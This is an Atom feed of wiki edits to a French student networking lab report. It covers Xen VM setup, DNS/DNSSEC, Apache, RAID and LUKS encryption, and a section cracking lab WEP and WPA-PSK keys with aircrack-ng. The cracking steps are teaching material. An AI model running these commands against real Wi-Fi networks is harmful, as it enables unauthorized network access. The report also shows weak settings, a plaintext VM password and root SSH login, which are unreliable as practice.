<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="fr">
		<id>https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Rbonvale</id>
		<title>Wiki d'activités IMA - Contributions de l’utilisateur [fr]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Rbonvale"/>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php/Sp%C3%A9cial:Contributions/Rbonvale"/>
		<updated>2026-05-12T21:39:45Z</updated>
		<subtitle>Contributions de l’utilisateur</subtitle>
		<generator>MediaWiki 1.29.2</generator>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=57840</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=57840"/>
				<updated>2022-01-11T14:40:26Z</updated>
		
		<summary type="html">&lt;p&gt;Rbonvale : /* 5.3  Cassage de mot de passe WPA-PSK par force brute */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour accéder à notre VM :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# xen console Karmeliet&lt;br /&gt;
&lt;br /&gt;
=Services Internet=&lt;br /&gt;
==Connexion ssh==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter en ssh, nous allons dans le fichier se trouvant au chemin :&lt;br /&gt;
 /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
On décommente Port et PermitRootLogin et on leur donne la valeur :&lt;br /&gt;
&lt;br /&gt;
 Port 22222&lt;br /&gt;
 PermitRootLogin Yes&lt;br /&gt;
&lt;br /&gt;
On a plus qu'à se connecter via ssh  : &lt;br /&gt;
 ssh root@193.48.57.179 -p 22222&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==DNS==&lt;br /&gt;
&lt;br /&gt;
On réserve un nom de domaine sur ghandi.net, en l'occurrence le notre sera : &lt;br /&gt;
 karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On rentre notre adresse IPv4 dans le &amp;quot;Glue records&amp;quot;&lt;br /&gt;
 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
On ajoute nos DNS primaire et secondaire pour obtenir un nom de serveur&lt;br /&gt;
 ns1.karmeliet.site (primaire)&lt;br /&gt;
 ns6.gandi.net (secondaire)&lt;br /&gt;
&lt;br /&gt;
===Configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
On installe les paquets&lt;br /&gt;
 apt install bind9&lt;br /&gt;
&lt;br /&gt;
On change le fichier /etc/resolv.conf&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
On va configurer notre DNS primaire dans le fichier de configuration /etc/bind/named.conf.local&lt;br /&gt;
De plus, on autorise le transfert d'information avec le DNS Secondaire (217.70.177.40)&lt;br /&gt;
 zone &amp;quot;karmeliet.site&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/db.karmeliet.site&amp;quot;;&lt;br /&gt;
   allow-transfer { 217.70.177.40; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
On créé un fichier db.karmeliet.site ayant le même template que db.local &lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de serveur DNS par DNSSEC==&lt;br /&gt;
&lt;br /&gt;
On ajoute dans le fichier named.conf.options&lt;br /&gt;
 dnssec-enable yes; &lt;br /&gt;
&lt;br /&gt;
On va dans le dossier bind&lt;br /&gt;
 /etc/bind&lt;br /&gt;
&lt;br /&gt;
On crée le dossier karmeliet.site.dnssec&lt;br /&gt;
 mkdir karmeliet.site.dnssec&lt;br /&gt;
&lt;br /&gt;
On crée la clef asymétrique de signature de clefs de zone&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On crée la clef asymétrique de la zone pour signer les enregistrements&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On renomme les deux paires de clefs avec le nom de notre zone en ajoutant -ksk et -zsk pour les clefs correspondantes.&lt;br /&gt;
&lt;br /&gt;
On inclue les clefs publiques dans votre fichier de zone db.karmeliet.site et on incrémente le numéro de version de la zone&lt;br /&gt;
 $include /etc/bind/karmeliet.site.dnssec/karmeliet.site-ksk.key&lt;br /&gt;
 $include /etc/bind/karmeliet.site.dnssec/karmeliet.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone&lt;br /&gt;
 dnssec-signzone -o karmeliet.site -k karmeliet.site-ksk ../db.karmeliet.site karmeliet.site-zsk&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier named.conf.local pour utiliser la zone signée de suffixe db.karmeliet.site.signed;&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu’à communiquer la partie publique de la KSK dans gandi.net&lt;br /&gt;
&lt;br /&gt;
==Certificat==&lt;br /&gt;
&lt;br /&gt;
Dans Gandi.net, on achète notre certificat en allant sur &lt;br /&gt;
 SSL certificate&lt;br /&gt;
&lt;br /&gt;
On nous demande une &amp;quot;Certificate Request&amp;quot; CSR que l'on a grâce à la commande &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
On remplit les différentes informations que l'on nous demande et on récupère notre csr dans server.csr à la fin de la commande.&lt;br /&gt;
&lt;br /&gt;
On va sur la page de notre certificat pour gandi et on copie colle comme ceci dans notre fichier db.karmeliet.site pour que notre certficat soit valide&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
 www	IN	A	193.48.57.179&lt;br /&gt;
 _D83578361950694C7CBA2CF57DDA0CE7.karmeliet.site. 10800 IN CNAME BEF099045291643A940FA49D11E8FB10.4CCF28E6A180333498A3F008A8B6CB32.0e21313c9c6df2403142.sectigo.com.&lt;br /&gt;
&lt;br /&gt;
==Serveur apache==&lt;br /&gt;
&lt;br /&gt;
On installe un serveur apache pour vérifier que tout fonctionne&lt;br /&gt;
 apt install apache2&lt;br /&gt;
&lt;br /&gt;
Pour installer apache correctement on a suivi les instructions sur ce site&lt;br /&gt;
 https://ubuntu.com/tutorials/install-and-configure-apache#1-overview&lt;br /&gt;
&lt;br /&gt;
Puis on a modifié notre fichier de configuration apache se trouvant dans /etc/apache2/sites-available&lt;br /&gt;
pour y mettre notre certificat :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site&lt;br /&gt;
         Redirect permanent / https://karmeliet.site/&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt; &lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site &lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /root/karmeliet.site.crt&lt;br /&gt;
         SSLCertificateKeyFile /root/karmeliet.site.key&lt;br /&gt;
 &lt;br /&gt;
         ErrorLog ${APACHE_LOG_DIR}/error.log&lt;br /&gt;
         CustomLog ${APACHE_LOG_DIR}/access.log combined&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de serveur DNS par DNSSEC==&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===5.3  Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Comme pour le cassage de la clé WEP, on utilise aircrack-ng:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
On récupère le nom de notre interface qui est wlan0mon puis on le lance en mode moniteur sur le channel 7:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
Il nous faut un point d'accès pour pouvoir casser une clé WPA en récupérant son BSSID: &lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisit kracotte11 avec un BSSID 44:AD:D9:5F:87:0A, on récupère ce qu'on appelle &amp;quot;handshake&amp;quot; et on le sauvegarde dans un fichier sauv:&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:0A -w sauv wlan0mon&lt;br /&gt;
&lt;br /&gt;
On peut commencer le crackage:&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng sauv-01.cap -w dico.txt&lt;br /&gt;
&lt;br /&gt;
On obtiens après quelques heures le résultat :&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ 59911999 ]&lt;br /&gt;
&lt;br /&gt;
 Master Key : EF A3 6F 02 E7 F1 DF 01 62 03 92 87 81 ED 99 6D &lt;br /&gt;
              25 28 7D D6 54 FC 29 41 5D BD E9 02 26 E7 F0 58&lt;br /&gt;
&lt;br /&gt;
=Réalisation=&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de données==&lt;br /&gt;
&lt;br /&gt;
Nous créons trois partitions LVM de 1Go dans le groupe de volume storage avec comme noms celui de notre serveur&lt;br /&gt;
 lvcreate -L1G -n oronge-raid1 storage&lt;br /&gt;
 lvcreate -L1G -n oronge-raid2 storage&lt;br /&gt;
 lvcreate -L1G -n oronge-raid3 storage&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les partitions à notre fichier de configuration qui se trouve dans /etc/xen/Karmeliet.cfg&lt;br /&gt;
 'phy:/dev/storage/karmeliet.site-raid1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/karmeliet.site-raid2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/karmeliet.site-raid3,xvdb3,w'&lt;br /&gt;
&lt;br /&gt;
On éteint puis relance la VM et on crée la partition Raid&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3&lt;br /&gt;
&lt;br /&gt;
On formate la partition en ext4&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
On ajoute au fichier /etc/fstab la partition formaté /dev/md0 pour qu'il soit monté durant le démarrage de la VM&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
==Chiffrement de données==&lt;br /&gt;
&lt;br /&gt;
On installe avec apt cryptsetup&lt;br /&gt;
 apt install lvm2 cryptsetup&lt;br /&gt;
&lt;br /&gt;
On regarde où est notre clé usb grâce à la commande lsblk, dans notre cas elle est dans sdb&lt;br /&gt;
&lt;br /&gt;
On la formatte &lt;br /&gt;
 mkfs.ext4 /dev/sdb&lt;br /&gt;
&lt;br /&gt;
On initialise notre clé USB avec l'option luksFormat et on choisis un mot de passe &lt;br /&gt;
 cryptsetup luksFormat /dev/sdb&lt;br /&gt;
&lt;br /&gt;
On ouvre notre partition chiffrée avec luksOpen (le nom du volume sera karmeliet_crypted) et on la formatte :&lt;br /&gt;
 cryptsetup luksOpen /dev/sdc karmeliet_crypted&lt;br /&gt;
 mkfs.ext4 /dev/mapper/karmeliet_crypted&lt;br /&gt;
&lt;br /&gt;
On monte la partition &lt;br /&gt;
 mkdir /mnt/karmelietCrypte&lt;br /&gt;
 mount -t ext4 /dev/mapper/karmeliet_crypted /mnt/karmelietCrypte/ &lt;br /&gt;
&lt;br /&gt;
On y ajoute un fichier texte hello dans lequel on  écrit &amp;quot;cc&amp;quot; puis on démonte la clé et on ferme le volume chiffré&lt;br /&gt;
 umount /mnt/karmelietCrypte&lt;br /&gt;
 cryptsetup luksClose karmeliet_crypted&lt;br /&gt;
&lt;br /&gt;
On a plus qu'a aller tester notre clé USB en la montant sur l'ordinateur d'un autre binôme et cela nous demande bien de rentrer un mot de passe notre clé est chiffré.&lt;/div&gt;</summary>
		<author><name>Rbonvale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=57837</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=57837"/>
				<updated>2022-01-11T14:38:47Z</updated>
		
		<summary type="html">&lt;p&gt;Rbonvale : /* Tests d'intrusions */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour accéder à notre VM :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# xen console Karmeliet&lt;br /&gt;
&lt;br /&gt;
=Services Internet=&lt;br /&gt;
==Connexion ssh==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter en ssh, nous allons dans le fichier se trouvant au chemin :&lt;br /&gt;
 /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
On décommente Port et PermitRootLogin et on leur donne la valeur :&lt;br /&gt;
&lt;br /&gt;
 Port 22222&lt;br /&gt;
 PermitRootLogin Yes&lt;br /&gt;
&lt;br /&gt;
On a plus qu'à se connecter via ssh  : &lt;br /&gt;
 ssh root@193.48.57.179 -p 22222&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==DNS==&lt;br /&gt;
&lt;br /&gt;
On réserve un nom de domaine sur ghandi.net, en l'occurrence le notre sera : &lt;br /&gt;
 karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On rentre notre adresse IPv4 dans le &amp;quot;Glue records&amp;quot;&lt;br /&gt;
 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
On ajoute nos DNS primaire et secondaire pour obtenir un nom de serveur&lt;br /&gt;
 ns1.karmeliet.site (primaire)&lt;br /&gt;
 ns6.gandi.net (secondaire)&lt;br /&gt;
&lt;br /&gt;
===Configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
On installe les paquets&lt;br /&gt;
 apt install bind9&lt;br /&gt;
&lt;br /&gt;
On change le fichier /etc/resolv.conf&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
On va configurer notre DNS primaire dans le fichier de configuration /etc/bind/named.conf.local&lt;br /&gt;
De plus, on autorise le transfert d'information avec le DNS Secondaire (217.70.177.40)&lt;br /&gt;
 zone &amp;quot;karmeliet.site&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/db.karmeliet.site&amp;quot;;&lt;br /&gt;
   allow-transfer { 217.70.177.40; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
On créé un fichier db.karmeliet.site ayant le même template que db.local &lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de serveur DNS par DNSSEC==&lt;br /&gt;
&lt;br /&gt;
On ajoute dans le fichier named.conf.options&lt;br /&gt;
 dnssec-enable yes; &lt;br /&gt;
&lt;br /&gt;
On va dans le dossier bind&lt;br /&gt;
 /etc/bind&lt;br /&gt;
&lt;br /&gt;
